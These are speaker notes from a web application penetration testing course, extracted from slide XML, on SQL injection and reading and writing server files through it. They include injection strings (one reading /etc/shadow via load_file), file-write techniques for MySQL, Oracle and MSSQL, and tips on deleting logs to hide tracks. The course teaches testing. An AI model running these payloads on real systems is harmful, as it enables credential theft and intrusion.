          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Retrieve data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Creates new data in database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Modifies existing data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Removes data from the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Union</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Combines the results of two queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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E547378-37E8-D44A-9C58-58D77BC8AB8A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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format for an "insert" command is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>INSERT into tablename (field1, field2, field3) VALUES (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'value1', 'value2', 'value3')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If the injection targets value1, then by inputting foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>',1,1)-- the query would end up as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>INSERT into tablename (field1, field2, field3) VALUES (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'foo',1, 1)--'','') </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Note: Anything after the --  is what the application we are injecting into adds to the query.  That is why we use the -- to comment it out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Note: SQL keywords are not case-sensitive. We are only using uppercase here to make the syntax easier to read.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85F679A-D53E-3F40-A045-CDF95F4F72FC}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Each database vendor extends the ANSI-SQL language to make their product "stand out" among the rest. This is useful for us because it can help us figure out the database type.  The "year()" function is but one example of many functions which can help identify the type of database in use.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>By fingerprinting the database we are able to know what further exploit queries can be potentially used. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea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DD5E386-65BD-4042-8EF8-897A003A5898}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">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a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this class, we will learn the practical art of web application penetration testing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 1, we will examine the attacker's perspective, and learn why it is important for us to build and deploy web application with the attacker's perspective in mind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>. We will also cover the pieces of a penetration test and how to scope and prepare for one.  Finally, we will explore the methodology that will be covered through the rest of class.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>During Day 2, we will step through the process that successful attackers use to exploit applications, focusing specifically on the reconnaissance and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>mapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> stages of the process.  This will give us the foundation we need to later control the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 3, we will build upon that foundation and start discovering the various weaknesses within the applications.  As penetration testers, we will map out the attack vectors that we are going to use against this application. These discoveries will be the basis for the exploitation phase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 4, we will continue our discovery focusing on client side components such as Flash and Java.  We will also explore the client-side scripting in use within our applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 5, we will launch the attacks that we planned and created during the previous three sections. We will also cover the next steps for students and where they should go from here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 6, we will be performing a web application pen-test within a capture the flag event.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13AAFF3-4512-BA47-84B8-55777E02F7D3}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Each database maintains information about itself inside system databases and tables. Note that some examples consult the system meta-data database tables while others access information about the "current" database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These queries are built to help fingerprint what the RDBMS is.  As we look into the exploit techniques next, this will help decide which attacks can work.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B1724FE-3FA3-E44C-A7F7-C1BAAF6B91A9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Some of the typical attack ideas are modifying data within the database.  For example, we could retrieve records or modify transactions.  We could also add users to an application or delete its event logs to hide our tracks.  It is only limited by our imagination.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that these ideas are the typical attacks but are also broad categories.  As we explore exploits, keep in mind these abilities!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3D48732-B10C-2343-97E1-7E08B67BC5DD}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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It is nice to be able to modify data and retrieve data sets.  But what else can we do?  We will explore further in the next few slides.  Remember that these attacks are dependent upon database version.  For example, the attack for reading files is different for MySQL and MSSQL.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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22425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Reading and Writing to Files with SQL injection is the first advanced attack we will explore.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22426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4E4954E7-6620-AC4A-8C6C-97E98E2E7C8A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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handling is a common exploit we can take after finding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> a SQL injection flaw.  As an attacker, the SQL injection flaw provides access, through the RDBMS, to the most sensitive information many organizations have.  It allows us to grab that data or pivot further into the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>This depends much on the functionality the RDBMS exposes and provides.  Some are easier than others.  We will look at a few of them next.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="948809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132F45E-6D12-DD48-8284-0FD2487DB443}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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MySQL has two methods of loading files into a database.  The first is the load_file function.  This function will read a file and make it part of a query using a UNION statement.  The second is the "load data" which will load the contents of a file into a table of its own.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To exploit this, we would inject the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' union select load_file('/etc/shadow'),1 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>in the input parameter.  This reads the shadow file from the server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>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38177F2-A38E-174E-A659-AB7044FE469B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Using the Select into command, an attacker can write a file into the server's file system.  This is typically only restricted by the permissions of MySQL.  Sadly MySQL runs as root quite often.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that outfile and dumpfile are interchangeable.  Both work within MySQL and so it becomes either a personal choice or on the rare chance that a filter is blocking one or the other.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D6AA3B9-C5B5-B24C-8AAD-0589D66FC980}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Oracle uses a set of stored procedures called "utl_file" to carry out file operations on local and remote filesystems. Below is an example of how to use utl_file to read the first line of a file (sample1.txt):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>declare</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>f utl_file.file_type;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>s varchar2(200);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>begin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>f := utl_file.fopen('SAMPLEDATA','sample1.txt','R');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>utl_file.get_line(f,s);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>utl_file.fclose(f);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>dbms_output.put_line(s);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>end;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>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E0077C8-B97F-FB4F-AD8A-D77DC403E422}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Microsoft SQL uses the BULK INSERT command to read a file into a table, similar to the load data command from MySQL.  This command will read the file and insert it into rows in the table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Microsoft SQL cannot natively write to a file.  The next slide will give two examples of ways to do this.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800F20C-D059-7944-952F-3D67A8D2C007}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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CREATE PROCEDURE sp_AppendToFile(@FileName varchar(255), @Text1 varchar(255)) AS </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>DECLARE @FS int, @OLEResult int, @FileID int </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>EXECUTE @OLEResult = sp_OACreate 'Scripting.FileSystemObject', @FS OUT </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IF @OLEResult &lt;&gt; 0 PRINT 'Scripting.FileSystemObject' </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>--Open a file </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>execute @OLEResult = sp_OAMethod @FS, 'OpenTextFile', @FileID OUT, @FileName, 8, 1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IF @OLEResult &lt;&gt; 0 PRINT 'OpenTextFile' </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>--Write Text1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>execute @OLEResult = sp_OAMethod @FileID, 'WriteLine', Null, @Text1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IF @OLEResult &lt;&gt; 0 PRINT 'WriteLine' </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>EXECUTE @OLEResult = sp_OADestroy @FileID </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>EXECUTE @OLEResult = sp_OADestroy @FS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ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19763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a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Today we will move to the final step in our methodology, exploitation.  We will explore the different types of flaws and how they can be exploited to further our access within the application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19763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8B0F82A-3888-1F4B-9FB1-51F462C7D12E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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B75E179-84DB-904E-81B7-2F9CD4C1FDAE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
